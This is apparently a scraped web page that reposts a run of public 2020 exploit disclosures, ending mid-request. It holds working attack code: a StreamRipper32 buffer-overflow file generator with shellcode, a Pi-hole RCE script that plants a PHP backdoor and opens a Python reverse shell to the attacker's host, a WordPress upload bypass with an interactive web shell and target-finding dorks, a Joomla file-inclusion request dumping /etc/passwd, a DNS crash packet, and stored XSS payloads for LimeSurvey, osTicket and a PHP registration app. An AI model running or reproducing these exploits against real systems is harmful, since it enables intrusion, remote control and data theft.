ISHACK AI BOT的内容 - 页 1741

# Exploit Title: StreamRipper32 2.6 - Buffer Overflow (PoC) # Date: 2020-05-14 # Exploit Author: Andy Bowden # Tested On: Win10 x64 # Download Link: http://streamripper.sourceforge.net/sr32/StreamRipper32_2_6.exe # Vendor Page: http://streamripper.sourceforge.net/ # Version: 2.6 # Steps To Reproduce: Double click on "Add" in the"Station/Song Section" and paste the output in "SongPattern" #Bad Characters \x00\x0A\x0D file = open('exploit.txt', 'wb') buf = b"" buf += b"A" * 256 buf += b"\x47\x23\x30\x74" #74302347 buf += b"\x90" * 30 #calc payload buf += b"\xdb\xc2\xbd\x72\x07\xda\xa7\xd9\x74\x24\xf4\x58\x29" buf += b"\xc9\xb1\x31\x83\xe8\xfc\x31\x68\x14\x03\x68\x66\xe5" buf += b"\x2f\x5b\x6e\x6b\xcf\xa4\x6e\x0c\x59\x41\x5f\x0c\x3d" buf += b"\x01\xcf\xbc\x35\x47\xe3\x37\x1b\x7c\x70\x35\xb4\x73" buf += b"\x31\xf0\xe2\xba\xc2\xa9\xd7\xdd\x40\xb0\x0b\x3e\x79" buf += b"\x7b\x5e\x3f\xbe\x66\x93\x6d\x17\xec\x06\x82\x1c\xb8" buf += b"\x9a\x29\x6e\x2c\x9b\xce\x26\x4f\x8a\x40\x3d\x16\x0c" buf += b"\x62\x92\x22\x05\x7c\xf7\x0f\xdf\xf7\xc3\xe4\xde\xd1" buf += b"\x1a\x04\x4c\x1c\x93\xf7\x8c\x58\x13\xe8\xfa\x90\x60" buf += b"\x95\xfc\x66\x1b\x41\x88\x7c\xbb\x02\x2a\x59\x3a\xc6" buf += b"\xad\x2a\x30\xa3\xba\x75\x54\x32\x6e\x0e\x60\xbf\x91" buf += b"\xc1\xe1\xfb\xb5\xc5\xaa\x58\xd7\x5c\x16\x0e\xe8\xbf" buf += b"\xf9\xef\x4c\xcb\x17\xfb\xfc\x96\x7d\xfa\x73\xad\x33" buf += b"\xfc\x8b\xae\x63\x95\xba\x25\xec\xe2\x42\xec\x49\x1c" buf += b"\x09\xad\xfb\xb5\xd4\x27\xbe\xdb\xe6\x9d\xfc\xe5\x64" buf += b"\x14\x7c\x12\x74\x5d\x79\x5e\x32\x8d\xf3\xcf\xd7\xb1" buf += b"\xa0\xf0\xfd\xd1\x27\x63\x9d\x3b\xc2\x03\x04\x44" buf += b"\x90" * (1000 - len(buf)) file.write(buf) file.close()

3月5日3月5日

# Exploit Title: Pi-hole 4.4.0 - Remote Code Execution (Authenticated) # Date: 2020-05-22 # Exploit Author: Photubias # Vendor Advisory: [1] https://github.com/pi-hole/AdminLTE # Version: Pi-hole <=4.4.0 + Web <=4.3.3 # Tested on: Pi-hole v4.4.0-g9e49077, Web v4.3.3,v4.3.2-1-g4f824be, FTL v5.0 (on Debian 10) # CVE: CVE-2020-11108 #!/usr/bin/env python3 ''' Copyright 2020 Photubias(c) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. Based (and improved on): https://github.com/Frichetten/CVE-2020-11108-PoC/blob/master/cve-2020-11108-rce.py File name CVE-2020-11108.py written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be ## Vulnerable setup instructions (from clean Debian 10-Buster): > apt update && apt install -y curl > curl -sSL https://install.pi-hole.net | bash > pihole checkout web release/v4.3.3 > cd /etc/.pihole/ && git checkout v4.4 > pihole -r ## Select reconfigure This is a native implementation without requirements, written in Python 3. Works equally well on Windows as Linux (as MacOS, probably ;-) Features: * Does a reliable check before exploitation (not based on version numbers) * Performs normal RCE without Privilege Escalation (wich is more trust worthy) * Asks before running Root RCE (as this overwrites certain files) * Performs a cleanup in all cases (success / failure) ''' import urllib.request, ssl, http.cookiejar, sys, string, random import socket, _thread, time ## Default vars; change at will _sURL = '192.168.50.130' _sPASSWORD = '6DS4QtW5' _iTIMEOUT = 5 _sLOCALIP = '192.168.50.1' _sFILENAME = 'fun2.php' _sLOCALNCPORT = '4444' ## Make sure to set up a listener on this port first ## Ignore unsigned certs ssl._create_default_https_context = ssl._create_unverified_context ## Keep track of cookies between requests cj = http.cookiejar.CookieJar() oOpener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj)) def randomString(iStringLength=8): sLetters = string.ascii_lowercase return ''.join(random.choice(sLetters) for i in range(iStringLength)) def postData(sURL, lData, bEncode = True): try: if bEncode: oData = urllib.parse.urlencode(lData).encode() else: oData = str(lData).encode() oRequest = urllib.request.Request(url = sURL, data = oData) return oOpener.open(oRequest, timeout = _iTIMEOUT) except: print('----- ERROR, site down?') sys.exit(1) def getEndpoint(): if not _sURL[:4].lower() == 'http': sURL = 'http://' + _sURL else: sURL = _sURL if not sURL[:-1] == '/': sURL += '/' if not '/admin' in sURL: sURL += 'admin' try: oRequest = urllib.request.Request(sURL) oResponse = oOpener.open(oRequest, timeout = _iTIMEOUT) except: print('[-] Error: ' + sURL + ' not responding') exit(1) if oResponse.code == 200: print('[+] Vulnerable URL is ' + sURL) return sURL else: print('[-] Error: ' + sURL + ' does not exist?') exit(1) def startListener(sPayload, iSockTimeout): ## Listener must always be on port 80, does not work otherwise oSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print('[!] Binding to '+_sLOCALIP+':80') oSock.bind((_sLOCALIP,80)) oSock.settimeout(iSockTimeout) oSock.listen() while True: try: oConn,sAddr= oSock.accept() except: break print('[+] Yes, we have an incoming connection from '+str(sAddr[0])) oConn.sendall(sPayload.encode()) oConn.close() break oSock.close() print('[!] Closing Listener') def doLogin(sURL, sPassword): sPath = '/index.php?login' lData = {'pw':sPassword} oResponse = postData(sURL + sPath, lData) sResult = oResponse.read().decode(errors='ignore') if 'Wrong password' in sResult: print('Wrong password') sys.exit(1) return True def getToken(sURL): sPath = '/settings.php?tab=blocklists' oResponse = oOpener.open(urllib.request.Request(sURL + sPath), timeout = _iTIMEOUT) sResult = oResponse.read().decode(errors='ignore') if 'id=\'token\'' in sResult: return sResult.split('id=\'token\' hidden>')[1].split('<')[0] else: print('[-] Error in getting a token') sys.exit(1) def createBackdoor(sURL, sFilename): sToken = getToken(sURL) sPath = '/settings.php?tab=blocklists' lData = {'newuserlists':'http://' + _sLOCALIP + '#" -o ' + sFilename + ' -d "', 'field':'adlists', 'token':sToken, 'submit':'save'} #lData = {'newuserlists':'http://' + _sLOCALIP + '#" -o fun.php -d "', 'field':'adlists', 'token':sToken, 'submit':'saveupdate'} oResponse = postData(sURL + sPath, lData) if oResponse.code == 200: sResult = oResponse.read().decode(errors='ignore') arrBlocklists = sResult.split('target="_new"') sID = str(len(arrBlocklists)-2) print('[+] Creation success, ID is '+sID+'!') return sID else: return '' def doUpdate(sURL): sPath = '/scripts/pi-hole/php/gravity.sh.php' try: oResponse = oOpener.open(urllib.request.Request(sURL + sPath), timeout = _iTIMEOUT) if oResponse.code == 200: print('[+] Update succeeded.') return True except: print('[-] Error; callback failed, maybe a firewall issue?') return False def callExploit(sURL, sFilename = _sFILENAME): sPath = '/scripts/pi-hole/php/' + sFilename print('[+] Calling ' + sURL + sPath) try: oResponse = oOpener.open(urllib.request.Request(sURL + sPath), timeout = _iTIMEOUT) if oResponse.code == 200: print('[+] Calling exploit succeeded.') print(oResponse.read().decode(errors='ignore')) except: pass def removeEntry(sURL, sID): print('[+] Cleaning up now.') sToken = getToken(sURL) sPath = '/settings.php?tab=blocklists' lData = {'adlist-del-'+sID:'on', 'newuserlists':'', 'field':'adlists', 'token':sToken, 'submit':'save'} oResponse = postData(sURL + sPath, lData) if oResponse.code == 200: print('[+] Remove success') def main(): global _sURL, _sPASSWORD, _iTIMEOUT, _sLOCALIP, _sFILENAME, _sLOCALNCPORT if len(sys.argv) == 1: print('[!] No arguments found: python3 CVE-2020-11108.py <dstIP> <srcIP> <PWD>') print(' Example: ./CVE-2020-11108.py 192.168.50.130 192.168.50.1 6DS4QtW5') print(' But for now, I will ask questions') sAnswer = input('[?] Please enter the IP address for Pi-Hole ([' + _sURL + ']): ') if not sAnswer == '': _sURL = sAnswer sAnswer = input('[?] Please enter the your (reachable) IP address to launch listeners ([' + _sLOCALIP + ']): ') if not sAnswer == '': _sLOCALIP = sAnswer sAnswer = input('[?] Please enter the password for Pi-Hole ([' + _sPASSWORD + ']): ') if not sAnswer == '': _sPASSWORD = sAnswer else: _sURL = sys.argv[1] _sLOCALIP = sys.argv[2] _sPASSWORD = sys.argv[3] ## MAIN sURL = getEndpoint() ## Will also set the initial SessionID doLogin(sURL, _sPASSWORD) ## Creating backdoor (1) ## the old 'fun.php' sFilename = randomString() + '.php' sID = createBackdoor(sURL, sFilename) ## Launch first payload listener and send 200 OK _thread.start_new_thread(startListener,('HTTP/1.1 200 OK\n\nCVE-2020-11108\n',5,)) if doUpdate(sURL): print('[+] This system is vulnerable!') ## Question Time sAnswer = input('Want to continue with exploitation? (Or just run cleanup)? [y/N]: ') if not sAnswer.lower() == 'y': removeEntry(sURL, sID) sys.exit(0) sAnswer = input('Want root access? (Breaks the application!!) [y/N]: ') if sAnswer.lower() == 'y': bRoot = True else: bRoot = False if bRoot: print('[!] Allright, going for the root shell') ## Launch payload listener and send root shell _sPayload = '''<?php shell_exec("sudo pihole -a -t") ?>''' _thread.start_new_thread(startListener,(_sPayload,5,)) doUpdate(sURL) ## Creating backdoor (2), overwriting teleporter.php sID2 = createBackdoor(sURL, 'teleporter.php') ## Launch payload listener for a new 200 OK _thread.start_new_thread(startListener,('HTTP/1.1 200 OK\n\nCVE-2020-11108\n',5,)) doUpdate(sURL) input('Ok, make sure to have a netcat listener on "' + _sLOCALIP + ':' + _sLOCALNCPORT + '" ("nc -lnvp ' + _sLOCALNCPORT + '") and press enter to continue...') ## Launch shell payload listener: _sPayload = '''<?php shell_exec("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"%s\\\",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\"/bin/sh\\",\\"-i\\"]);'") ?> ''' %(_sLOCALIP, _sLOCALNCPORT) #_sPayload = '''<?php system($_GET['cmd']); ?>''' ## this works perfectly, but the URL is authenticated _thread.start_new_thread(startListener,(_sPayload,5,)) doUpdate(sURL) ## Launching the payload, will create new PHP file callExploit(sURL, sFilename) ## Remove entry again if bRoot: removeEntry(sURL, sID2) removeEntry(sURL, sID) if len(sys.argv) == 1: input('[+] All done, press enter to exit') if __name__ == "__main__": main()

3月5日3月5日

# Exploit Title: Joomla! Plugin XCloner Backup 3.5.3 - Local File Inclusion (Authenticated) # Date: 2020-05-10 # Exploit Author: Mehmet Kelepçe / Gais Cyber Security # Exploit-Db Author ID: 8763 # Reference: https://www.xcloner.com/xcloner-news/security-release-available-for-archived-joomla-version/ # Vendor Homepage: http://www.xcloner.com # Software Link: https://www.xcloner.com/support/download/ # Version: 3.5.3 # Tested on: Kali Linux - Apache2 -------------------------------------------------------------------------------- Detail: -------------------------------------------------------------------------------- File: administrator/components/com_xcloner-backupandstore/admin.cloner.php --> ------------ case 'download': downloadBackup($_REQUEST['file']); break; ------------- downloadBackup function's file -> administrator/components/com_xcloner-backupandstore/cloner.functions.php Vulnerable parameter: file downloadBackup function's definition -------------------------------------------------------------------------------- function downloadBackup($file) { global $_CONFIG; $file = realpath($_CONFIG['clonerPath'] . "/$file"); //First, see if the file exists if (!is_file($file)) { die("<b>404 File $file was not found!</b>"); } //File Info $len = get_filesize($file); $filename = basename($file); $file_extension = strtolower(substr(strrchr($filename, "."), 1)); //Setam Content-Type-urile pentru fisierul in cauza switch ($file_extension) { default: $ctype = "application/force-download"; } smartReadFile($file, $filename); exit; } -------------------------------------------------------------------------------- and smartReadFile function's definition -------------------------------------------------------------------------------- function smartReadFile($location, $filename, $mimeType='application/octet-stream') { if(!file_exists($location)) { header ("HTTP/1.0 404 Not Found"); return; } $size=filesize($location); $time=date('r',filemtime($location)); $fm=@fopen($location,'r'); . . . -------------------------------------------------------------------------------- PoC: Request: -------------------------------------------------------------------------------- GET /joomla/administrator/index.php?option=com_xcloner-backupandrestore&task=download&file=../../../../../../../../etc/passwd HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/joomla/administrator/index.php?option=com_xcloner-backupandrestore&task=view Connection: close Cookie: COOKIES Upgrade-Insecure-Requests: 1 -------------------------------------------------------------------------------- Response: -------------------------------------------------------------------------------- HTTP/1.0 200 OK Date: Sun, 10 May 2020 18:12:04 GMT Server: Apache/2.4.41 (Debian) Cache-Control: public, must-revalidate, max-age=0 Pragma: no-cache Accept-Ranges: bytes Content-Length: 3347 Content-Range: bytes 0-3347/3347 Content-Disposition: inline; filename=passwd Content-Transfer-Encoding: binary Last-Modified: Sun, 22 Mar 2020 05:41:35 -0700 Connection: close Content-Type: application/octet-stream root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync . .

3月5日3月5日

# Exploit Title: WordPress Plugin Drag and Drop File Upload Contact Form 1.3.3.2 - Remote Code Execution # Date: 2020-05-11 # Exploit Author: Austin Martin # Google Dork: inurl:wp-content/uploads/wp_dndcf7_uploads/ # Google Dork: inurl:wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/ # Vendor Homepage: https://www.codedropz.com/ # Software Link: https://wordpress.org/plugins/drag-and-drop-multiple-file-upload-contact-form-7/ # Version: 1.3.3.2 # Tested on: WordPress 5.4.1, PHP 7.41 # CVE : N/A # Notes: # At time of disclosure, the WordPress page listed this plugin being used by +10,000 applications # Application was patched by vendor within 24 hours of initial disclosure # This exploit works bypassing the allowed file types and file type sanitization. If lucky, a PHP file with a reverse shell can be uploaded and accessed # Any file types can be added to the "supported_type" parameter # These uploaded files can be accessed at wp-content/uploads/wp_dndcf7_uploads/ # Dangerous file types such as php have "_.txt" appended to the end creating a text file # This can be bypassed by adding '%' to the end of the allowed file type, and the end of the file name # ex. "php%" for file type and "shell.php%" for filename # The PHP payload in the POC can be easily modified to gain a reverse shell #!/usr/bin/python import string import random import requests from bs4 import BeautifulSoup import sys payloadurl="" def RecurseLinks(base,file): headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0"} f = requests.get(base, headers=headers) soup = BeautifulSoup(f.content, "html.parser") for root in soup.find_all("a"): href = root.get("href") if (href.startswith("/")): do = "nothing" elif (href.endswith("/")): RecurseLinks(base + href, file) else: if file in href: print ("\n[+] File Found --> " + base + href) global payloadurl payloadurl = (base+href) def main(): #os.system('cls') print("WordPress Plugin \'Drag and Drop Multiple File Upload - Contact Form 7\' 1.3.3.2 - Unauthenticated Remote Code Execution") print("@amartinsec --> Twitter\nCVE:2020-12800\n") #Build The Request #Generate random URL for filename file = ''.join(random.sample((string.ascii_uppercase + string.digits), 6)) urlinput = raw_input("[+] Enter url to the vulnerable WordPress application: ") #Finding the nonce used in the Ajax security string print ("\n[+] Searching for security string nonce") headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36'} homepage = requests.get(urlinput,headers=headers) homepage = homepage.text homepage = homepage.split("ajax_nonce\":\"",1)[1] securitykey = homepage[:10] print("[+] Found security string --> " + securitykey) url = urlinput + "/wp-admin/admin-ajax.php" headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------350278735926454076983690555601", } data = "-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"supported_type\"\r\n\r\n" \ "php%\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"size_limit\"\r\n\r\n" \ "5242880\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\n" \ "dnd_codedropz_upload\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"type" \ "\"\r\n\r\nclick\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"security\"\r" \ "\n\r\n" + securitykey +"\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"upload-file\"; " \ "filename=\"" + file +".php%\"\r\nContent-Type: text/plain\r\n\r\n" \ "<?php echo shell_exec($_GET['e'].' 2>&1'); ?>" \ "\r\n-----------------------------350278735926454076983690555601--\r\n" print "\n[+] Sending payload to target" response = requests.post(url, headers=headers, data=data) if "200" in str(response): print("[+] Looks like a successful file upload!\n") elif "403" in str(response): print("\nFile Upload Failed") print("403 in response. Check security string") sys.exit(1) else: print("File upload failed. Try the manual way with Burp") sys.exit(1) print("[+] Crawling for the uploaded file. This may take a minute...") print("[+] Searching for " + file + ".php") RecurseLinks(urlinput + "/wp-content/uploads/",file) if payloadurl == "": print("Can't find the file on the web server") print("Try the manual method") sys.exit(1) #If all goes well, we can now send requests for RCE print("[+] Success\n") while True: cmd= raw_input("[+] CMD: ") headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36'} request = requests.get(payloadurl + "?e=" + cmd, headers=headers) print request.text if __name__ == "__main__": main()

3月5日3月5日

#!/usr/bin/python #coding:utf-8 from scapy.all import DNS, DNSQR, IP, sr1, UDP, DNSRRTSIG, DNSRROPT tsig = DNSRRTSIG(rrname="local-ddns", algo_name="hmac-sha256", rclass=255, mac_len=0, mac_data="", time_signed=0, fudge=300, error=16) dns_req = IP(dst='127.0.0.1')/UDP(dport=53)/DNS(rd=1, ad=1, qd=DNSQR(qname='www.example.com'), ar=tsig) answer = sr1(dns_req, verbose=0) print(answer[DNS].summary())

3月5日3月5日

Exploit Title: Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting # Google Dork: N/A # Date: 2020-05-26 # Exploit Author: that faceless coder(Inveteck Global) # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/ # Version: Online Marriage Registration System 1.0 - Stored Cross-Site Scripting # Tested on: MAC OS MOJAVE v 10.14.6 # CVE : N/A The Online Marriage Registration System suffers from multiple stored cross-site script vulnerabilities: if(isset($_POST['submit'])) { $nofhusband=$_POST['nofhusband']; $hreligion=$_POST['hreligion']; $haddress=$_POST['haddress']; $hstate=$_POST['hstate']; $nofwife=$_POST['nofwife']; $wreligion=$_POST['wreligion']; $waddress=$_POST['waddress']; $wstate=$_POST['wstate']; $witnessnamef=$_POST['witnessnamef']; $waddressfirst=$_POST['waddressfirst']; $witnessnames=$_POST['witnessnames']; $waddresssec=$_POST['waddresssec']; $witnessnamet=$_POST['witnessnamet']; $waddressthird=$_POST['waddressthird']; $sql="insert into tblregistration(RegistrationNumber,UserID,DateofMarriage,HusbandName,HusImage,HusbandReligion,Husbanddob,HusbandSBM,HusbandAdd,HusbandZipcode,HusbandState,HusbandAdharno,WifeName,WifeImage,WifeReligion,Wifedob,WifeSBM,WifeAdd,WifeZipcode,WifeState,WifeAdharNo,WitnessNamefirst,WitnessAddressFirst,WitnessNamesec,WitnessAddresssec,WitnessNamethird,WitnessAddressthird)values(:regnumber,:uid,:dom,:nofhusband,:husimg,:hreligion,:hdob,:hsbmarriage,:haddress,:hzipcode,:hstate,:hadharno,:nofwife,:wifeimg,:wreligion,:wdob,:wsbmarriage,:waddress,:wzipcode,:wstate,:wadharno,:witnessnamef,:waddressfirst,:witnessnames,:waddresssec,:witnessnamet,:waddressthird)"; $query=$dbh->prepare($sql); $sql="insert into tblregistration(RegistrationNumber,UserID,DateofMarriage,HusbandName,HusImage,HusbandReligion,Husbanddob,HusbandSBM,HusbandAdd,HusbandZipcode,HusbandState,HusbandAdharno,WifeName,WifeImage,WifeReligion,Wifedob,WifeSBM,WifeAdd,WifeZipcode,WifeState,WifeAdharNo,WitnessNamefirst,WitnessAddressFirst,WitnessNamesec,WitnessAddresssec,WitnessNamethird,WitnessAddressthird)values(:regnumber,:uid,:dom,:nofhusband,:husimg,:hreligion,:hdob,:hsbmarriage,:haddress,:hzipcode,:hstate,:hadharno,:nofwife,:wifeimg,:wreligion,:wdob,:wsbmarriage,:waddress,:wzipcode,:wstate,:wadharno,:witnessnamef,:waddressfirst,:witnessnames,:waddresssec,:witnessnamet,:waddressthird)"; $query=$dbh->prepare($sql); $query->bindParam(':nofhusband',$nofhusband,PDO::PARAM_STR); $query->bindParam(':hreligion',$hreligion,PDO::PARAM_STR); $query->bindParam(':hdob',$hdob,PDO::PARAM_STR); $query->bindParam(':hsbmarriage',$hsbmarriage,PDO::PARAM_STR); $query->bindParam(':haddress',$haddress,PDO::PARAM_STR); $query->bindParam(':hzipcode',$hzipcode,PDO::PARAM_STR); $query->bindParam(':hstate',$hstate,PDO::PARAM_STR); $query->bindParam(':hadharno',$hadharno,PDO::PARAM_STR); $query->bindParam(':nofwife',$nofwife,PDO::PARAM_STR); $query->bindParam(':wifeimg',$wifeimg,PDO::PARAM_STR); $query->bindParam(':wreligion',$wreligion,PDO::PARAM_STR); $query->bindParam(':wdob',$wdob,PDO::PARAM_STR); $query->bindParam(':wsbmarriage',$wsbmarriage,PDO::PARAM_STR); $query->bindParam(':waddress',$waddress,PDO::PARAM_STR); $query->bindParam(':wzipcode',$wzipcode,PDO::PARAM_STR); $query->bindParam(':wstate',$wstate,PDO::PARAM_STR); $query->bindParam(':wadharno',$wadharno,PDO::PARAM_STR); $query->bindParam(':witnessnamef',$witnessnamef,PDO::PARAM_STR); $query->bindParam(':waddressfirst',$waddressfirst,PDO::PARAM_STR); $query->bindParam(':witnessnames',$witnessnames,PDO::PARAM_STR); $query->bindParam(':waddresssec',$waddresssec,PDO::PARAM_STR); $query->bindParam(':witnessnamet',$witnessnamet,PDO::PARAM_STR); $query->bindParam(':waddressthird',$waddressthird,PDO::PARAM_STR); $query->execute(); $LastInsertId=$dbh->lastInsertId(); if ($LastInsertId>0) { echo '<script>alert("Registration form has been filled successfully.")</script>'; } else { echo '<script>alert("Something Went Wrong. Please try again")</script>'; } The data gets stored through the mentioned vulnerable parameters into the database. There is no filtering when those values are printed when the web application fetches the data from the database

3月5日3月5日

# Exploit Title: LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting # Date: 05/26/2020 # Exploit Author: Matthew Aberegg # Vendor Homepage: https://www.limesurvey.org # Version: LimeSurvey 4.1.11+200316 # Tested on: Ubuntu 18.04.4 # Patch Link: https://github.com/LimeSurvey/LimeSurvey/commit/2aada33c76efbbc35d33c149ac02b1dc16a81f62 # Vulnerability Details Description : A stored cross-site scripting vulnerability exists within the "Permission Roles" functionality of the LimeSurvey administration panel. Vulnerable Parameters : Permissiontemplates[name], Permissiontemplates[description] # POC # Exploit Details : The following request will create a permission role with an XSS payload as the role name and description. POST /limesurvey/index.php/admin/roles/sa/applyedit HTTP/1.1 Host: TARGET Content-Length: 443 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://TARGET Referer: http://TARGET/limesurvey/index.php/admin/roles Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: YII_CSRF_TOKEN=RWc3emx-NVhlfm1xamJhRkVSWGlkc1lRfmR5U0RRalYzu7h7NfgUoNTY6kMmTkPkB3J0_IsbOQQEMfsWGmt0Pg%3D%3D; LS-ERXSBPYJOOGIGFYW=m4qshhf7m76ifsm6k0v1vq084h Connection: close YII_CSRF_TOKEN=RWc3emx-NVhlfm1xamJhRkVSWGlkc1lRfmR5U0RRalYzu7h7NfgUoNTY6kMmTkPkB3J0_IsbOQQEMfsWGmt0Pg%3D%3D&Permissiontemplates%5Bptid%5D=&Permissiontemplates%5Bname%5D=%3Cimg+src%3D%2F+onerror%3Dalert(1)%3E&Permissiontemplates%5Bdescription%5D=%3Cimg+src%3D%2F+onerror%3Dalert(1)%3E&Permissiontemplates%5Brenewed_last%5D=2020-03-31+17%3A51%3A02&Permissiontemplates%5Bcreated_at%5D=2020-03-31+17%3A51%3A02&Permissiontemplates%5Bcreated_by%5D=1

3月5日3月5日

# Exploit Title: osTicket 1.14.1 - 'Ticket Queue' Persistent Cross-Site Scripting # Date: 2020-05-26 # Exploit Author: Matthew Aberegg # Vendor Homepage: https://osticket.com # Patch Link: https://github.com/osTicket/osTicket/commit/6c724ea3fe352d10d457d334dc054ef81917fde1 # Version: osTicket 1.14.1 # Tested on: CentOS 7 (1908) # Vulnerability Details # Description : A persistent cross-site scripting vulnerability exists within the 'Ticket Queue' functionality of osTicket. # Vulnerable Parameter : queue-name # POC # Exploit Details : The following request will create a ticket queue with an XSS payload as the queue name. POST /os-ticket/scp/queues.php? HTTP/1.1 Host: TARGET Content-Length: 4491 Cache-Control: max-age=0 Origin: http://TARGET Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://TARGET/os-ticket/scp/queues.php? Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: OSTSESSID=0c1ssokv9npgmlolue4utj3l81 Connection: close __CSRFToken__=849ba29024f9d9a894b82fafe29437ace2edc4fa&do=create&a=add&id=&queue-name=%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&parent_id=0&fields%5B%5D=status__id&fields%5B%5D=status__state&fields%5B%5D=dept_id&fields%5B%5D=assignee&fields%5B%5D=topic_id&fields%5B%5D=created&fields%5B%5D=est_duedate&fields%5B%5D=duedate&250f895b1cb39a=&_field-checkboxes%5B%5D=1545030345&21128ea1697b9a%5B%5D=includes&c88a27abe7cfab%5B%5D=1&8c6a793c80594e%5B%5D=includes&27ca5f383385cb%5B%5D=includes&82094a76afc304%5B%5D=assigned&85d9edefffa2af%5B%5D=set&a504e6f17eb29c%5B%5D=set&0cc4d080a6f9c7=&3bf29b1e29f88a=&cdf4550c8c6152=&6fd24fee5b5572=&fc1676be53debd=&8097e50092c904=&6691443ad8db48%5B%5D=&a34b4283149a9c=&14e270255589aa%5B%5D=d&f5c5cacb5af509=&197e4e922ff97d%5B%5D=d&046798c3e2934b=&35fedfb3380450%5B%5D=d&0358d35fd35b18=&6e8cc954821ab8%5B%5D=d&e8d808c9daa716%5B%5D=set&ba9c3701fead0c=&d5eed7d2b6f6d6=&42861e6193e58b=&5c39f4b522d7bc=&2008591c98253e=&d37db1b3627ff7=&24fb32de6f1bb7%5B%5D=&6759a92723004c=&bad7322c569428%5B%5D=d&ed195f6bb72ac4=&dded6ab7ae5f7d%5B%5D=d&2f075fa6f1d982=&608f0a963cf3ee%5B%5D=d&1a29ab5444d543=&df9d61f18b866b%5B%5D=d&d72deaa7c372fc%5B%5D=set&76bf3342e88075=&7a259ed4ddda1b=&bb46d89a671337=&4a459564d07f4d=&8f724bccb10aa8=&cb91e9d8492749=&5b783534587f6a%5B%5D=&68dc79a3890bef=&1f25af8e5603df%5B%5D=d&28959e91fd9838=&204683549219a5%5B%5D=d&0a68d064cd567a=&d4b3a0b1aea1b8%5B%5D=d&90c9e78164a9d4=&e4b53638ab9b55%5B%5D=d&new-field=&filter=&sort_id=&columns%5B1%5D%5Bcolumn_id%5D=1&columns%5B1%5D%5Bheading%5D=Number&columns%5B1%5D%5Bwidth%5D=85&columns%5B1%5D%5Bsortable%5D=on&columns%5B2%5D%5Bcolumn_id%5D=2&columns%5B2%5D%5Bheading%5D=Created&columns%5B2%5D%5Bwidth%5D=120&columns%5B2%5D%5Bsortable%5D=on&columns%5B3%5D%5Bcolumn_id%5D=3&columns%5B3%5D%5Bheading%5D=Subject&columns%5B3%5D%5Bwidth%5D=250&columns%5B3%5D%5Bsortable%5D=on&columns%5B4%5D%5Bcolumn_id%5D=4&columns%5B4%5D%5Bheading%5D=From&columns%5B4%5D%5Bwidth%5D=150&columns%5B4%5D%5Bsortable%5D=on&columns%5B5%5D%5Bcolumn_id%5D=5&columns%5B5%5D%5Bheading%5D=Priority&columns%5B5%5D%5Bwidth%5D=120&columns%5B5%5D%5Bsortable%5D=on&columns%5B8%5D%5Bcolumn_id%5D=8&columns%5B8%5D%5Bheading%5D=Assignee&columns%5B8%5D%5Bwidth%5D=100&columns%5B8%5D%5Bsortable%5D=on&exports%5Bnumber%5D%5Bname%5D=Ticket+Number&exports%5Bnumber%5D%5Bheading%5D=T